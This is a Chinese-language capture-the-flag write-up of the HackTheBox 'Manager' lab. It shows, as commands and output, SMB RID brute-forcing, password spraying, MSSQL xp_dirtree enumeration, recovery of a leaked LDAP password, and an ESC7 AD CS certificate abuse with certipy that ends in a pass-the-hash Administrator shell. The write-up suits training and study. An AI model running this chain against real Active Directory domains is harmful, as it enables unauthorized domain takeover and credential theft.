靶机ip:10.10.11.236

知识点

  • SMB RID爆破
  • 用户名密码爆破
  • xp_dirtree 枚举目录
  • ESC7提权

信息收集

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
./rustscan -a 10.10.11.236 -u 5000
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Open ports, closed hearts.

[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.236:53
Open 10.10.11.236:80
Open 10.10.11.236:88
Open 10.10.11.236:135
Open 10.10.11.236:139
Open 10.10.11.236:389
Open 10.10.11.236:445
Open 10.10.11.236:464
Open 10.10.11.236:593
Open 10.10.11.236:636
Open 10.10.11.236:1433
Open 10.10.11.236:3268
Open 10.10.11.236:3269
Open 10.10.11.236:5985
Open 10.10.11.236:9389
Open 10.10.11.236:49667
Open 10.10.11.236:49689
Open 10.10.11.236:49690
Open 10.10.11.236:49693
Open 10.10.11.236:49721
Open 10.10.11.236:49769

HTTP服务

image-20250324112759015

是个静态网站,目录扫描也没有结果,暂时先搁置了

SMB服务

1
2
3
4
5
6
7
8
9
10
11
12
13
smbclient -L //10.10.11.236
Password for [WORKGROUP\root]:

Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.236 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

发现没什么有价值的共享

使用netexec进行RID枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
netexec smb 10.10.11.236 -u "test" -p "" --rid-brute --log smb_rid_brute
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\test: (Guest)
SMB 10.10.11.236 445 DC01 498: MANAGER\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 500: MANAGER\Administrator (SidTypeUser)
SMB 10.10.11.236 445 DC01 501: MANAGER\Guest (SidTypeUser)
SMB 10.10.11.236 445 DC01 502: MANAGER\krbtgt (SidTypeUser)
SMB 10.10.11.236 445 DC01 512: MANAGER\Domain Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 513: MANAGER\Domain Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 514: MANAGER\Domain Guests (SidTypeGroup)
SMB 10.10.11.236 445 DC01 515: MANAGER\Domain Computers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 516: MANAGER\Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 517: MANAGER\Cert Publishers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 518: MANAGER\Schema Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 519: MANAGER\Enterprise Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 520: MANAGER\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.11.236 445 DC01 521: MANAGER\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 522: MANAGER\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.11.236 445 DC01 525: MANAGER\Protected Users (SidTypeGroup)
SMB 10.10.11.236 445 DC01 526: MANAGER\Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 527: MANAGER\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.11.236 445 DC01 553: MANAGER\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.11.236 445 DC01 571: MANAGER\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 572: MANAGER\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1000: MANAGER\DC01$ (SidTypeUser)
SMB 10.10.11.236 445 DC01 1101: MANAGER\DnsAdmins (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.11.236 445 DC01 1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
SMB 10.10.11.236 445 DC01 1113: MANAGER\Zhong (SidTypeUser)
SMB 10.10.11.236 445 DC01 1114: MANAGER\Cheng (SidTypeUser)
SMB 10.10.11.236 445 DC01 1115: MANAGER\Ryan (SidTypeUser)
SMB 10.10.11.236 445 DC01 1116: MANAGER\Raven (SidTypeUser)
SMB 10.10.11.236 445 DC01 1117: MANAGER\JinWoo (SidTypeUser)
SMB 10.10.11.236 445 DC01 1118: MANAGER\ChinHae (SidTypeUser)
SMB 10.10.11.236 445 DC01 1119: MANAGER\Operator (SidTypeUser)

发现很多用户名,并且保存到 smb_rid_brute文件中了,将用户名提取出来

1
2
3
4
5
6
7
8
9
10
11
12
cat smb_rid_brute | grep SidTypeUser | awk -F'\' '{print $2}' | awk -F ' ' '{print $1}'
Administrator
Guest
krbtgt
DC01$
Zhong
Cheng
Ryan
Raven
JinWoo
ChinHae
Operator

将结果保存到user.txt

根据用户名制作一个简单的字典

  • 用户名全大写
  • 用户名全小写
  • 用户名与密码相同
1
cat user.txt | awk '{print tolower($0)}' > passwd.txt

使用netexec枚举

1
2
3
4
5
6
7
8
9
10
11
12
13
netexec smb 10.10.11.236 -u user.txt -p passwd.txt --no-bruteforce --continue-on-success
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [-] manager.htb\Administrator:administrator STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Guest:guest STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\krbtgt:krbtgt STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\DC01$:dc01$ STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Zhong:zhong STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Cheng:cheng STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Ryan:ryan STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\Raven:raven STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\JinWoo:jinwoo STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [-] manager.htb\ChinHae:chinhae STATUS_LOGON_FAILURE
SMB 10.10.11.236 445 DC01 [+] manager.htb\Operator:operator

得到了一组用户名密码

1
2
username: Operator
password: operator

继续使用netexec进行枚举

1
2
3
4
5
6
7
8
9
10
11
netexec smb 10.10.11.236 -u Operator -p operator --shares
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.236 445 DC01 [+] manager.htb\Operator:operator
SMB 10.10.11.236 445 DC01 [*] Enumerated shares
SMB 10.10.11.236 445 DC01 Share Permissions Remark
SMB 10.10.11.236 445 DC01 ----- ----------- ------
SMB 10.10.11.236 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.236 445 DC01 C$ Default share
SMB 10.10.11.236 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.236 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.236 445 DC01 SYSVOL READ Logon server share

smb没什么有价值的东西,继续枚举其他协议

1
2
3
4
5
6
7
8
9
10
11
netexec winrm 10.10.11.236 -u Operator -p operator
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [-] manager.htb\Operator:operator

netexec mssql 10.10.11.236 -u Operator -p operator
MSSQL 10.10.11.236 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.10.11.236 1433 DC01 [+] manager.htb\Operator:operator

netexec wmi 10.10.11.236 -u Operator -p operator
RPC 10.10.11.236 135 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
RPC 10.10.11.236 135 DC01 [+] manager.htb\Operator:operator

发现可以利用mssql和wmi,尝试后发现使用impacket-wmiexec登陆失败,原因是权限不足,所以我们利用mssql登录

1
2
3
4
5
6
7
8
9
10
11
12
impacket-mssqlclient manager.htb/Operator:operator@10.10.11.236 -windows-auth
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>

注:需要加-windows-auth参数才可以登录

MSSQL攻击

  • xp_cmdshell 执行命令失败
  • xp_dirtree 捕获hash也无法破解成明文

事已至此只能使用xp_dirtree查找一下机器的文件了

1
2
3
4
5
6
7
8
9
10
11
12
SQL (MANAGER\Operator  guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1

最终在C:\inetpub\wwwroot下找到了备份文件

从网站上下载下来

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
wget http://manager.htb/website-backup-27-07-23-old.zip
unzip website-backup-27-07-23-old.zip -d website
cd website

ls -al
total 68
drwxr-xr-x 5 root root 4096 Mar 24 12:18 .
drwxr-xr-x 3 root root 4096 Mar 24 12:18 ..
-rw-r--r-- 1 root root 5386 Jul 27 2023 about.html
-rw-r--r-- 1 root root 5317 Jul 27 2023 contact.html
drwxr-xr-x 2 root root 4096 Mar 24 12:18 css
drwxr-xr-x 2 root root 4096 Mar 24 12:18 images
-rw-r--r-- 1 root root 18203 Jul 27 2023 index.html
drwxr-xr-x 2 root root 4096 Mar 24 12:18 js
-rw-r--r-- 1 root root 698 Jul 27 2023 .old-conf.xml
-rw-r--r-- 1 root root 7900 Jul 27 2023 service.html

发现有一个.old-conf.xml文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>

找到了另一组用户名密码

1
2
username: raven
password: R4v3nBe5tD3veloP3r!123

使用netexec继续枚举

1
2
3
netexec winrm 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123 (Pwn3d!)

使用evil-winrm登录

1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents> whoami
manager\raven

成功登录,并在Desktop找到user.txt

ESC7提权

1
2
3
4
5
6
7
8
9
10
11
12
13
netexec ldap 10.10.11.236 -u Operator -p operator -M adcs
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\Operator:operator
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA

netexec ldap 10.10.11.236 -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -M adcs
SMB 10.10.11.236 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
LDAP 10.10.11.236 389 DC01 [+] manager.htb\raven:R4v3nBe5tD3veloP3r!123
ADCS 10.10.11.236 389 DC01 [*] Starting LDAP search with search filter '(objectClass=pKIEnrollmentService)'
ADCS 10.10.11.236 389 DC01 Found PKI Enrollment Server: dc01.manager.htb
ADCS 10.10.11.236 389 DC01 Found CN: manager-DC01-CA

发现这两个用户都是域用户,并且都配置了ADCS服务

使用certipy-ad寻找利用点

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
certipy-ad find -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.10.11.236 -stdout -vulnerable
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Trying to get CA configuration for 'manager-DC01-CA' via CSRA
[*] Got CA configuration for 'manager-DC01-CA'
[*] Enumeration output:
Certificate Authorities
0
CA Name : manager-DC01-CA
DNS Name : dc01.manager.htb
Certificate Subject : CN=manager-DC01-CA, DC=manager, DC=htb
Certificate Serial Number : 5150CE6EC048749448C7390A52F264BB
Certificate Validity Start : 2023-07-27 10:21:05+00:00
Certificate Validity End : 2122-07-27 10:31:04+00:00
Web Enrollment : Disabled
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Permissions
Owner : MANAGER.HTB\Administrators
Access Rights
Enroll : MANAGER.HTB\Operator
MANAGER.HTB\Authenticated Users
MANAGER.HTB\Raven
ManageCertificates : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
ManageCa : MANAGER.HTB\Administrators
MANAGER.HTB\Domain Admins
MANAGER.HTB\Enterprise Admins
MANAGER.HTB\Raven
[!] Vulnerabilities
ESC7 : 'MANAGER.HTB\\Raven' has dangerous permissions
Certificate Templates : [!] Could not find any certificate templates

发现可以使用ESC7提权

参考链接:https://www.thehacker.recipes/ad/movement/adcs/access-controls#esc7-abusing-subca

第一步:通过 ManageCa 权限,赋予自己 ManageCertificates 权限 (使用 -add-officer 参数)

1
2
3
4
certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -add-officer raven
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

第二步: 使用 SubCA 证书模板,注册一个 SANAdministrator 的证书

1
2
3
4
5
6
7
8
9
certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -template SubCA -upn Administrator
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[-] Got error while trying to request certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
[*] Request ID is 23
Would you like to save the private key? (y/N) y
[*] Saved private key to 23.key
[-] Failed to request certificate

记下我们的 Request ID 并 (输入 y) 保留私钥

第三步:通过 ManageCertificates 权限发布刚刚申请失败的证书

1
2
3
4
certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -dc-ip 10.10.11.236 -issue-request 23
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Successfully issued certificate

第四步:通过 ID 和私钥文件,检索我们发布的证书

1
2
3
4
5
6
7
8
9
certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ca 'manager-DC01-CA' -retrieve 23
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Rerieving certificate with ID 23
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Loaded private key from '23.key'
[*] Saved certificate and private key to 'administrator.pfx'

第五步:使用证书进行认证,拿到 Administrator 账户的 NT hash

先同步一下时间

1
ntpdate -s manager.htb

继续攻击

1
2
3
4
5
6
7
8
9
certipy-ad auth -pfx administrator.pfx -username Administrator -domain manager.htb -dc-ip 10.10.11.236
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@manager.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

使用netexec验证一下hash

1
2
3
netexec winrm 10.10.11.236 -u Administrator -H aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef
WINRM 10.10.11.236 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
WINRM 10.10.11.236 5985 DC01 [+] manager.htb\Administrator:ae5064c2f62317332c88629e025924ef (Pwn3d!)

使用evil-winrm登录

1
2
3
4
5
6
7
8
9
10
11
evil-winrm -i 10.10.11.236 -u Administrator -H ae5064c2f62317332c88629e025924ef

Evil-WinRM shell v3.7

Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
manager\administrator

登陆成功,在Desktop找到root.txt